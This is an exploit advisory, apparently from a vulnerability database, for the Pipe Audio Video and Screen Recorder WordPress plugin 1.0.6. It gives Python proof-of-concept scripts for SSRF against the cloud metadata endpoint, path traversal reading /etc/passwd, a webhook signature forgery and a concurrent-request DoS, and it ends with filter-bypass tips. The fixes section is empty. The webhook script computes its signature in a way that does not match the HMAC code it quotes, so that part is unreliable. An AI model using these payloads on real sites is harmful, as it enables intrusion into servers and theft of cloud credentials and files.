WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities

2025.04.06
Credit: bRpsd
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: WordPress Pipe Audio Video and Screen Recorder 1.0.6 - Multiple Vulnerabilities # Date: March 28, 2025 # Exploit Author: bRpsd cy[at]live.no # Plugin Link: https://wordpress.org/plugins/pipe-audio-video-and-screen-recorder/ # Version: 1.0.6 # Tested on: MacOS local Xampp Vulnerability1: SSRF in File Download File:load/AddPipe.php Function: addpipe_handle_download() Vulnerable Code: ================================================================================================ public function addpipe_handle_download() { // ... $fileUrl = isset($_POST['file']) ? esc_url_raw(wp_unslash($_POST['file'])) : ''; $allowed_domains = ['addpipe.com']; $parsed_url = wp_parse_url($fileUrl); if (!isset($parsed_url['host']) || !in_array($parsed_url['host'], $allowed_domains, true)) { wp_send_json_error(['message' => 'Unauthorized domain'], 403); } $fileContent = @file_get_contents($fileUrl); // SSRF here // ... } ================================================================================================ Vuln1 Python POC: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ import requests target = "http://example.com/wp-admin/admin-ajax.php" nonce = "VALID_NONCE_HERE" # Replace with actual nonce # Craft malicious URL (redirects to internal service) malicious_url = "https://addpipe.com/redirect?url=http://169.254.169.254/latest/meta-data" data = { "action": "addpipe_download_file", "file": malicious_url, "_wpnonce": nonce } response = requests.post(target, data=data) print(f"SSRF Response ({response.status_code}):\n{response.text[:500]}") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Vulnerability2: LFI via Quality Parameter File: load/AddPipe.php Function: addpipe_ajax_shortcode_generator() Vulnerable Code: ================================================================================================ public function addpipe_ajax_shortcode_generator() { // ... $quality = isset($_POST['quality']) ? sanitize_text_field(wp_unslash($_POST['quality'])) : ''; $qualityurl = "avq/" . $quality . ".xml"; // LFI here $data = [ 'qualityurl' => $qualityurl, // ... ]; // ... } ================================================================================================ Vuln2 Python POC: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ import requests from urllib.parse import quote target = "http://example.com/wp-admin/admin-ajax.php" nonce = "VALID_NONCE_HERE" # Replace with actual nonce # Directory traversal payload lfi_payload = quote("../../../../etc/passwd") data = { "action": "addpipe_ajax_shortcode_generator", "quality": lfi_payload, "_wpnonce": nonce } response = requests.post(target, data=data) print(f"LFI Response ({response.status_code}):\n{response.text}") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Vulnerability3: Webhook Signature Bypass File: load/AddPipe.php Function: addpipeWebhook() Vulnerable Code: ================================================================================================ public function addpipeWebhook() { $webhook_url = admin_url('admin-ajax.php?action=addpipeWebhook'); $received_signature = $_SERVER['HTTP_X_PIPE_SIGNATURE'] ?? ''; $json_payload = file_get_contents('php://input'); $data_to_sign = $webhook_url . $json_payload; $expected_signature = base64_encode(hash_hmac('sha1', $data_to_sign, $this->pipeWebhookKey, true)); if (!hash_equals($expected_signature, $received_signature)) { wp_die('Unauthorized request', 403); } // ... } ================================================================================================ Vuln3 Python POC: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ import hashlib import base64 import requests webhook_url = "http://example.com/wp-admin/admin-ajax.php?action=addpipeWebhook" known_key = "WEAK_SECRET_KEY" # Replace with guessed/exposed key malicious_payload = { "event": "video_recorded", "data": { "id": 666, "envCode": "attacker_env", "videoName": "hacked_recording" } } # Generate forged signature signature_data = webhook_url + str(malicious_payload) signature = base64.b64encode( hashlib.sha1(signature_data.encode()).hexdigest().encode() ).decode() headers = { "X-Pipe-Signature": signature, "Content-Type": "application/json" } response = requests.post(webhook_url, json=malicious_payload, headers=headers) print(f"Webhook Injection ({response.status_code}): {response.text}") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Vulnerability4: DoS via Sync Endpoint File: load/AddPipe.php Function: addpipe_ajax_sync_deleted() Vulnerable Code: ================================================================================================ public function addpipe_ajax_sync_deleted() { foreach ($this->addpipeGetRecordedRecordings() as $obj) { if (!$this->addpipeIsFileOnServer($obj->recording_url)) { $wpdb->query("UPDATE {$wpdb->prefix}addpipe_records SET active = 0..."); } } } ================================================================================================ Vuln4 POC: import requests from concurrent.futures import ThreadPoolExecutor target = "http://example.com/wp-admin/admin-ajax.php" nonce = "VALID_ADMIN_NONCE" # Requires admin privileges def send_sync_request(_): data = {"action": "addpipe_ajax_sync_deleted", "_wpnonce": nonce} response = requests.post(target, data=data) return response.status_code # Launch 100 concurrent requests with ThreadPoolExecutor(max_workers=20) as executor: results = list(executor.map(send_sync_request, range(100))) print(f"DoS Results: {set(results)}") Defense Bypass: For LFI/SSRF: Use double encoding (%252e%252e%252f) Chain with open redirect vulnerabilities Exploit parser inconsistencies (e.g., ///etc/passwd Fixes:


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top